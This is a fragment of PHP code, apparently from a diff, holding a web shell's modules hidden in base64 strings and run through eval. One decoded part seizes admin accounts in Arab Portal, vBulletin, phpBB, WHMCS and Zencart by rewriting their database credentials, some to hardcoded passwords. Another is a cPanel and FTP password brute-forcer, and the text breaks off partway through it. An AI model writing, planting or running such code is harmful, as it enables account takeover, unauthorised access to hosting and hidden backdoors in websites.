vICc8Rk9STSBtZXRob2Q9IlBPU1QiPiA6OjpEYXRhQmFzZSBpbmZvOjo6PGJyPiBob3N0IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9ImxvY2FsaG9zdCIgbmFtZT0ibG9jYWxob3N0IiB0eXBlPSJ0ZXh0Ij4gPGJyPmRhdGFiYXNlIDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0iZGF0YWJhc2UiIHR5cGU9InRleHQiPjxicj4gPGJyPnVzZXJuYW1lIDogPGJyPjxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0idXNlcm5hbWUiIHR5cGU9InRleHQiPiA8YnI+cGFzc3dvcmQgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJwYXNzd29yZCIgdHlwZT0icGFzc3dvcmQiPjxicj4gICA8YnI+Ojo6QXJhYiBQb3J0YWwgQWRtaW4gaW5mbzo6OiA8YnI+TmV3IHVzZXJuYW1lOjxicj4gPElOUFVUIG5hbWU9ImFkbWluIiBzaXplPSIxNSIgdmFsdWU9ImFkbWluIj48YnI+IE5ldyBwYXNzd29yZDo8YnI+IDxJTlBVVCBuYW1lPSJwd2QiIHNpemU9IjE1IiB2YWx1ZT0iMTIzMTIzIj48YnI+IE5ldyBFbWFpbDo8YnI+IDxJTlBVVCBuYW1lPSJlbWFpbCIgc2l6ZT0iMTUiIHZhbHVlPSJlbWFpbEBzaXRlLmNvbSI+PGJyPiA8SU5QVVQgdmFsdWU9ImNoYW5nZS1hcmFiLXBvcnRhbC1hZG1pbiIgbmFtZT0ic2VuZCIgdHlwZT0ic3VibWl0Ij4gPC9GT1JNPic7IH0gaWYgKCRfUE9TVFsnc2VuZCddID09ICdjaGFuZ2UtYXJhYi1wb3J0YWwtYWRtaW4nKXsgJGxvY2FsaG9zdCA9ICRfUE9TVFsnbG9jYWxob3N0J107ICRkYXRhYmFzZSAgPSAkX1BPU1RbJ2RhdGFiYXNlJ107ICR1c2VybmFtZSAgPSAkX1BPU1RbJ3VzZXJuYW1lJ107ICRwYXNzd29yZCAgPSAkX1BPU1RbJ3Bhc3N3b3JkJ107ICRwd2QgICA9ICRfUE9TVFsncHdkJ107ICRhZG1pbiA9ICRfUE9TVFsnYWRtaW4nXTsgJFNRTCA9ICRfUE9TVFsnZW1haWwnXTsgICBAbXlzcWxfY29ubmVjdCgkbG9jYWxob3N0LCR1c2VybmFtZSwkcGFzc3dvcmQpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgIEBteXNxbF9zZWxlY3RfZGIoJGRhdGFiYXNlKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAkaGFzaCA9IG1kNSgkcHdkKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSByYWZpYV91c2VycyBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VybmFtZSAgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHJhZmlhX3VzZXJzIFNFVCBwYXNzd29yZCA9JyIuJGhhc2guIicgV0hFUkUgdXNlcm5hbWUgID0gJ2FkbWluJyIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSByYWZpYV91c2VycyBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VyZ3JvdXAgPSAxIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHJhZmlhX3VzZXJzIFNFVCBwYXNzd29yZCA9JyIuJGhhc2guIicgV0hFUkUgdXNlcmdyb3VwID0gMSIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSByYWZpYV91c2VycyBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VyYWRtaW4gPSAxIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHJhZmlhX3VzZXJzIFNFVCBwYXNzd29yZCA9JyIuJGhhc2guIicgV0hFUkUgdXNlcmFkbWluID0gMSIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSByYWZpYV91c2VycyBTRVQgZW1haWwgPSciLiRTUUwuIicgV0hFUkUgdXNlcm5hbWUgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzczwvYj4gIjsgfSAgfSAgIGlmICgkX1BPU1RbJ0NoYW5nZS1BZG1pbl90eXBlJ10gPT0gJ3ZiJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+dXNlcm5hbWUgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJ1c2VybmFtZSIgdHlwZT0idGV4dCI+IDxicj5wYXNzd29yZCA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InBhc3N3b3JkIiB0eXBlPSJwYXNzd29yZCI+PGJyPiAgIDxicj46Ojp2YiBBZG1pbiBpbmZvOjo6IDxicj5OZXcgdXNlcm5hbWU6PGJyPiA8SU5QVVQgbmFtZT0iYWRtaW4iIHNpemU9IjE1IiB2YWx1ZT0iYWRtaW4iPjxicj4gTmV3IHBhc3N3b3JkOjxicj4gMTIxNzc3PGJyPiBOZXcgRW1haWw6PGJyPiA8SU5QVVQgbmFtZT0iZW1haWwiIHNpemU9IjE1IiB2YWx1ZT0iZW1haWxAc2l0ZS5jb20iPjxicj4gPElOUFVUIHZhbHVlPSJjaGFuZ2UtdmItYWRtaW4iIG5hbWU9InNlbmQiIHR5cGU9InN1Ym1pdCI+IDwvRk9STT4nOyB9IGlmICgkX1BPU1RbJ3NlbmQnXSA9PSAnY2hhbmdlLXZiLWFkbWluJyl7ICRsb2NhbGhvc3QgPSAkX1BPU1RbJ2xvY2FsaG9zdCddOyAkZGF0YWJhc2UgID0gJF9QT1NUWydkYXRhYmFzZSddOyAkdXNlcm5hbWUgID0gJF9QT1NUWyd1c2VybmFtZSddOyAkcGFzc3dvcmQgID0gJF9QT1NUWydwYXNzd29yZCddOyAkcHdkICAgPSAkX1BPU1RbJ3B3ZCddOyAkYWRtaW4gPSAkX1BPU1RbJ2FkbWluJ107ICRTUUwgPSAkX1BPU1RbJ2VtYWlsJ107ICAgQG15c3FsX2Nvbm5lY3QoJGxvY2FsaG9zdCwkdXNlcm5hbWUsJHBhc3N3b3JkKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICBAbXlzcWxfc2VsZWN0X2RiKCRkYXRhYmFzZSkgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgJGhhc2ggPSBtZDUoJHB3ZCk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgdXNlciBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VybmFtZSAgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHVzZXIgU0VUIHBhc3N3b3JkID0nMzA0MjE3Nzg5MGMyZTc5NzczZTBlZDhlOGVmNmQwMzYnIFdIRVJFIHVzZXJuYW1lICA9ICdhZG1pbiciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgdXNlciBTRVQgdXNlcm5hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VyaWQgPSAxIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHVzZXIgU0VUIHBhc3N3b3JkID0nMzA0MjE3Nzg5MGMyZTc5NzczZTBlZDhlOGVmNmQwMzYnIFdIRVJFIHVzZXJpZCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgdXNlciBTRVQgZW1haWwgPSciLiRTUUwuIicgV0hFUkUgdXNlcm5hbWUgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzcyA8YnI+TmV3IHBhc3N3b3JkID0gMTIxNzc3PC9iPiAiOyB9ICB9ICBpZiAoJF9QT1NUWydDaGFuZ2UtQWRtaW5fdHlwZSddID09ICdwaHBiYicpeyBlY2hvICc8Rk9STSBtZXRob2Q9IlBPU1QiPiA6OjpEYXRhQmFzZSBpbmZvOjo6PGJyPiBob3N0IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9ImxvY2FsaG9zdCIgbmFtZT0ibG9jYWxob3N0IiB0eXBlPSJ0ZXh0Ij4gPGJyPmRhdGFiYXNlIDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0iZGF0YWJhc2UiIHR5cGU9InRleHQiPjxicj4gPGJyPlRhYmxlIFByZWZpeCA6PGJyPiA8SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSJwaHBiYl8iIG5hbWU9InByZWZpeCIgdHlwZT0idGV4dCI+PGJyPiA8YnI+dXNlcm5hbWUgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJ1c2VybmFtZSIgdHlwZT0idGV4dCI+IDxicj5wYXNzd29yZCA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InBhc3N3b3JkIiB0eXBlPSJwYXNzd29yZCI+PGJyPiAgIDxicj46OjpwaHBCQiBBZG1pbiBpbmZvOjo6IDxicj5OZXcgdXNlcm5hbWU6PGJyPiA8SU5QVVQgbmFtZT0iYWRtaW4iIHNpemU9IjE1IiB2YWx1ZT0iYWRtaW4iPjxicj4gTmV3IHBhc3N3b3JkOjxicj4gPElOUFVUIG5hbWU9InB3ZCIgc2l6ZT0iMTUiIHZhbHVlPSIxMjMxMjMiPjxicj4gTmV3IEVtYWlsOjxicj4gPElOUFVUIG5hbWU9ImVtYWlsIiBzaXplPSIxNSIgdmFsdWU9ImVtYWlsQHNpdGUuY29tIj48YnI+IDxJTlBVVCB2YWx1ZT0iY2hhbmdlLXBocEJCLUFkbWluIiBuYW1lPSJzZW5kIiB0eXBlPSJzdWJtaXQiPiA8L0ZPUk0+JzsgfSBpZiAoJF9QT1NUWydzZW5kJ10gPT0gJ2NoYW5nZS1waHBCQi1BZG1pbicpeyAkbG9jYWxob3N0ID0gJF9QT1NUWydsb2NhbGhvc3QnXTsgJGRhdGFiYXNlICA9ICRfUE9TVFsnZGF0YWJhc2UnXTsgJHVzZXJuYW1lICA9ICRfUE9TVFsndXNlcm5hbWUnXTsgJHBhc3N3b3JkICA9ICRfUE9TVFsncGFzc3dvcmQnXTsgJHB3ZCAgID0gJF9QT1NUWydwd2QnXTsgJGFkbWluID0gJF9QT1NUWydhZG1pbiddOyAkU1FMID0gJF9QT1NUWydlbWFpbCddOyAkcHJlZml4ID0gJF9QT1NUWydwcmVmaXgnXTsgICBAbXlzcWxfY29ubmVjdCgkbG9jYWxob3N0LCR1c2VybmFtZSwkcGFzc3dvcmQpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgIEBteXNxbF9zZWxlY3RfZGIoJGRhdGFiYXNlKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAkaGFzaCA9IG1kNSgkcHdkKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VybmFtZV9jbGVhbiA9JyIuJGFkbWluLiInIFdIRVJFIHVzZXJuYW1lX2NsZWFuID0gJ2FkbWluJyIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX3Bhc3N3b3JkID0nIi4kaGFzaC4iJyBXSEVSRSB1c2VybmFtZV9jbGVhbiA9ICdhZG1pbiciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcm5hbWVfY2xlYW4gPSciLiRhZG1pbi4iJyBXSEVSRSB1c2VyX3R5cGUgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfcGFzc3dvcmQgPSciLiRoYXNoLiInIFdIRVJFIHVzZXJfdHlwZSA9IDMiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9lbWFpbCA9JyIuJFNRTC4iJyBXSEVSRSB1c2VybmFtZV9jbGVhbiA9ICdhZG1pbiciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAgaWYoJHRrbCl7IGVjaG8gIjxiPiBTdWNjZXNzPC9iPiAiOyB9IH0gIGlmICgkX1BPU1RbJ0NoYW5nZS1BZG1pbl90eXBlJ10gPT0gJ3dobWNzJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+dXNlcm5hbWUgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJ1c2VybmFtZSIgdHlwZT0idGV4dCI+IDxicj5wYXNzd29yZCA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InBhc3N3b3JkIiB0eXBlPSJwYXNzd29yZCI+PGJyPiAgIDxicj46Ojp3aG1jcyBBZG1pbiBpbmZvOjo6IDxicj5OZXcgdXNlcm5hbWU6PGJyPiA8SU5QVVQgbmFtZT0iYWRtaW4iIHNpemU9IjE1IiB2YWx1ZT0iYWRtaW4iPjxicj4gTmV3IHBhc3N3b3JkOjxicj4gPElOUFVUIG5hbWU9InB3ZCIgc2l6ZT0iMTUiIHZhbHVlPSIxMjMxMjMiPjxicj4gTmV3IEVtYWlsOjxicj4gPElOUFVUIG5hbWU9ImVtYWlsIiBzaXplPSIxNSIgdmFsdWU9ImVtYWlsQHNpdGUuY29tIj48YnI+IDxJTlBVVCB2YWx1ZT0iY2hhbmdlLXdobWNzLWFkbWluIiBuYW1lPSJzZW5kIiB0eXBlPSJzdWJtaXQiPiA8L0ZPUk0+JzsgfSBpZiAoJF9QT1NUWydzZW5kJ10gPT0gJ2NoYW5nZS13aG1jcy1hZG1pbicpeyAkbG9jYWxob3N0ID0gJF9QT1NUWydsb2NhbGhvc3QnXTsgJGRhdGFiYXNlICA9ICRfUE9TVFsnZGF0YWJhc2UnXTsgJHVzZXJuYW1lICA9ICRfUE9TVFsndXNlcm5hbWUnXTsgJHBhc3N3b3JkICA9ICRfUE9TVFsncGFzc3dvcmQnXTsgJHB3ZCAgID0gJF9QT1NUWydwd2QnXTsgJGFkbWluID0gJF9QT1NUWydhZG1pbiddOyAkU1FMID0gJF9QT1NUWydlbWFpbCddOyAgIEBteXNxbF9jb25uZWN0KCRsb2NhbGhvc3QsJHVzZXJuYW1lLCRwYXNzd29yZCkgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgQG15c3FsX3NlbGVjdF9kYigkZGF0YWJhc2UpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgICRoYXNoID0gbWQ1KCRwd2QpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHRibGFkbWlucyBTRVQgcGFzc3dvcmQgPSciLiRoYXNoLiInIHdoZXJlIGlkPScxJyIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSB0YmxhZG1pbnMgU0VUIHVzZXJuYW1lID0nIi4kYWRtaW4uIicgd2hlcmUgaWQ9JzEnIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFIHRibGFkbWlucyBTRVQgcm9sZWlkPScxJyB3aGVyZSBpZD0nMSciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgdGJsYWRtaW5zIFNFVCBlbWFpbCA9JyIuJFNRTC4iJyBXSEVSRSB1c2VybmFtZSA9ICdhZG1pbiciKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICBpZigkdGtsKXsgZWNobyAiPGI+IFN1Y2Nlc3M8L2I+ICI7IH0gIH0gICBpZiAoJF9QT1NUWydDaGFuZ2UtQWRtaW5fdHlwZSddID09ICd6ZW5jYXJ0Jyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0icHJlZml4IiB0eXBlPSJ0ZXh0Ij48YnI+IDxicj51c2VybmFtZSA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InVzZXJuYW1lIiB0eXBlPSJ0ZXh0Ij4gPGJyPnBhc3N3b3JkIDogPGJyPjxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIj48YnI+ICAgPGJyPjo6OnplbmNhcnQgQWRtaW4gaW5mbzo6OiA8YnI+TmV3IHVzZXJuYW1lOjxicj4gPElOUFVUIG5hbWU9ImFkbWluIiBzaXplPSIxNSIgdmFsdWU9ImFkbWluIj48YnI+IE5ldyBwYXNzd29yZDo8YnI+IDEyMTc3Nzxicj4gTmV3IEVtYWlsOjxicj4gPElOUFVUIG5hbWU9ImVtYWlsIiBzaXplPSIxNSIgdmFsdWU9ImVtYWlsQHNpdGUuY29tIj48YnI+IDxJTlBVVCB2YWx1ZT0iY2hhbmdlLXplbmNhcnQtYWRtaW4iIG5hbWU9InNlbmQiIHR5cGU9InN1Ym1pdCI+IDwvRk9STT4nOyB9IGlmICgkX1BPU1RbJ3NlbmQnXSA9PSAnY2hhbmdlLXplbmNhcnQtYWRtaW4nKXsgJGxvY2FsaG9zdCA9ICRfUE9TVFsnbG9jYWxob3N0J107ICRkYXRhYmFzZSAgPSAkX1BPU1RbJ2RhdGFiYXNlJ107ICR1c2VybmFtZSAgPSAkX1BPU1RbJ3VzZXJuYW1lJ107ICRwYXNzd29yZCAgPSAkX1BPU1RbJ3Bhc3N3b3JkJ107ICRwd2QgICA9ICRfUE9TVFsncHdkJ107ICRhZG1pbiA9ICRfUE9TVFsnYWRtaW4nXTsgJFNRTCA9ICRfUE9TVFsnZW1haWwnXTsgJHByZWZpeCA9ICRfUE9TVFsncHJlZml4J107ICAgQG15c3FsX2Nvbm5lY3QoJGxvY2FsaG9zdCwkdXNlcm5hbWUsJHBhc3N3b3JkKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICBAbXlzcWxfc2VsZWN0X2RiKCRkYXRhYmFzZSkgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgJGhhc2ggPSBtZDUoJHB3ZCk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJhZG1pbiBTRVQgYWRtaW5fbmFtZSA9JyIuJGFkbWluLiInIFdIRVJFIGFkbWluX2xldmVsID0gMSIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguImFkbWluIFNFVCBhZG1pbl9wYXNzID0nYjQyZjNjYzhhZmQ3NjMzNGNiMmMzYzNjZGZlZTExMzE6NzknIFdIRVJFIGFkbWluX25hbWUgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4iYWRtaW4gU0VUIGFkbWluX25hbWUgPSciLiRhZG1pbi4iJyBXSEVSRSBhZG1pbl9pZCA9MSIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguImFkbWluIFNFVCBhZG1pbl9wYXNzID0nYjQyZjNjYzhhZmQ3NjMzNGNiMmMzYzNjZGZlZTExMzE6NzknIFdIRVJFIGFkbWluX2lkID0xIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4iYWRtaW4gU0VUIGFkbWluX2VtYWlsID0nIi4kU1FMLiInIFdIRVJFIGFkbWluX25hbWUgPSAnYWRtaW4nIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzcyA8YnI+IE5ldyBwYXNzd29yZCA9IDEyMTc3NzwvYj4gIjsgfSAgfQ==";
+eval(base64_decode($tkl));
+exit;
+case "Bruteforce":
+$tkl = "CiRjcGFuZWxfcG9ydD0iMjA4MiI7CiRjb25uZWN0X3RpbWVvdXQ9NTsKQGVycm9yX3JlcG9ydGluZygwKTsKc2V0X3RpbWVfbGltaXQoMCk7CiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsKJHVzZXJzPSRfUkVRVUVTVFsndXNlcnMnXTsKJHBhc3M9JF9SRVFVRVNUWydwYXNzd29yZHMnXTsKJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOwokY3JhY2t0eXBlPSRfUkVRVUVTVFsnY3JhY2t0eXBlJ107CiR0YXJnZXQgPSAibG9jYWxob3N0IjsKCmVjaG8nCjxmb3JtICBtZXRob2Q9IlBPU1QiPgpVc2VycyBsaXN0ICZuYnNwOyAmbmJzcDsgJm5ic3A7ICAmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDtQYXNzd29yZCBsaXN0PGJyPgo8dGV4dGFyZWEgcm93cz0iMjAiIG5hbWU9InVzZXJzIiBjb2xzPSIyNSI+Jy4kdXNlcnMuJzwvdGV4dGFyZWE+PHRleHRhcmVhIHJvd3M9IjIwIiBuYW1lPSJwYXNzd29yZHMiIGNvbHM9IjI1Ij4nLiRwYXNzLic8L3RleHRhcmVhPjxicj4KClNlbGVjdCBCcnV0ZWZvcmNlIFR5cGUgOiA8YnIvPjxwPgo8c2VsZWN0IG5hbWU9ImNyYWNrdHlwZSI+CjxvcHRpb24gdmFsdWU9ImNwYW5lbCI+Q1BhbmVsIENyYWNrPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9ImZ0cCI+RlRQIENyYWNrPC9vcHRpb24+Cjwvc2VsZWN0Pgo8YnI+PCEtLVQuSy5MLS0+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDcmFjayIgbmFtZT0ic3VibWl0Ii8+CjwvcD48L2Zvcm0+JzsKCQkKaWYgKCRfUE9TVFsnY3JhY2t0eXBlJ109PSdmdHAnKXsKZnVuY3Rpb24gYnJ1dGUoKQp7CglnbG9iYWwgJHZhbHMsJG1pbl9sZW5ndGgsJG1heF9sZW5ndGg7CglnbG9iYWwgJHRhcmdldCwkcHVyZXVzZXIsJGNvbm5lY3RfdGltZW91dDsKCSRtaW49JG1pbl9sZW5ndGg7CgkkbWF4PSRtYXhfbGVuZ3RoOwoJJEEgPSBhcnJheSgpOwoJJG51bVZhbHMgPSBjb3VudCgkdmFscyk7CgkkaW5jRG9uZSA9ICIiOwoJJHJlYWxNYXggPSAiIjsKCSRjdXJyZW50VmFsID0gIiI7CgkkZmlyc3RWYWwgPSAiIjsKCWZvciAoJGkgPSAwOyAkaSA8ICgkbWF4ICsgMSk7ICRpKyspIHsKCQkkQVskaV0gPSAtMTsKCX0KCQoJZm9yICgkaSA9IDA7ICRpIDwgJG1heDsgJGkrKykgewoJCSRyZWFsTWF4ID0gJHJlYWxNYXggLiAkdmFsc1skbnVtVmFscyAtIDFdOwoJfQoJZm9yICgkaSA9IDA7ICRpIDwgJG1pbjsgJGkrKykgewoJCSRBWyRpXSA9ICR2YWxzWzBdOwoJfQoJJGkgPSAwOwoJd2hpbGUgKCRBWyRpXSAhPSAtMSkgewoJCSRmaXJzdFZhbCAuPSAkQVskaV07CgkJJGkrKzsKCX0KCWNwYW5lbF9jaGVjaygkdGFyZ2V0LCRwdXJldXNlciwkZmlyc3RWYWwsJGNvbm5lY3RfdGltZW91dCk7CgkKCXdoaWxlICgxKSB7CgkJZm9yICgkaSA9IDA7ICRpIDwgKCRtYXggKyAxKTsgJGkrKykgewoJCQlpZiAoJEFbJGldID09IC0xKSB7CgkJCQlicmVhazsKCQkJfQoJCX0KCQkkaS0tOwoJCSRpbmNEb25lID0gMDsKCQl3aGlsZSAoISRpbmNEb25lKSB7CQoJCQlmb3IgKCRqID0gMDsgJGogPCAkbnVtVmFsczsgJGorKykgewoJCQkJaWYgKCRBWyRpXSA9PSAkdmFsc1skal0pIHsKCQkJCQlicmVhazsKCQkJCX0KCQkJfQoJCQlpZiAoJGogPT0gKCRudW1WYWxzIC0gMSkpIHsKCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJJGktLTsKCQkJCWlmICgkaSA8IDApIHsKCQkJCQlmb3IgKCRpID0gMDsgJGkgPCAoJG1heCArIDEpOyAkaSsrKSB7CgkJCQkJCWlmICgkQVskaV0gPT0gLTEpIHsKCQkJCQkJCWJyZWFrOwoJCQkJCQl9CgkJCQkJfQoJCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJCSRBWyRpICsgMV0gPSAtMTsKCQkJCQkkaW5jRG9uZSA9IDE7CgkJCQkJcHJpbnQgIlN0YXJ0aW5nICIgLiAoc3RybGVuKCRjdXJyZW50VmFsKSArIDEpIC4gIiBDaGFyYWN0ZXJzIENyYWNraW5nPGJyPiI7CgkJCQl9CgkJCX0gZWxzZSB7CgkJCQkkQVskaV0gPSAkdmFsc1skaiArIDFdOwoJCQkJJGluY0RvbmUgPSAxOwoJCQl9CgkJfQoJCSRpID0gMDsKCQkkY3VycmVudFZhbCA9ICIiOwoJCXdoaWxlICgkQVskaV0gIT0gLTEpIHsKCQkJJGN1cnJlbnRWYWwgPSAkY3VycmVudFZhbCAuICRBWyRpXTsKCQkJJGkrKzsKCQl9CgkJY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRjdXJyZW50VmFsLCRjb25uZWN0X3RpbWVvdXQpOwoJCWlmICgkY3VycmVudFZhbCA9PSAkcmVhbE1heCkgewoJCQlyZXR1cm4gMDsKCQl9Cgl9Cn0KZnVuY3Rpb24gZ2V0bWljcm90aW1lKCkgewogICBsaXN0KCR1c2VjLCAkc2VjKSA9IGV4cGxvZGUoIiAiLG1pY3JvdGltZSgpKTsKICAgcmV0dXJuICgoZmxvYXQpJHVzZWMgKyAoZmxvYXQpJHNlYyk7Cn0gCgpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpCnsKICRjaCA9IGN1cmxfaW5pdCgpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImZ0cDovLyRob3N0Iik7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hUVFBBVVR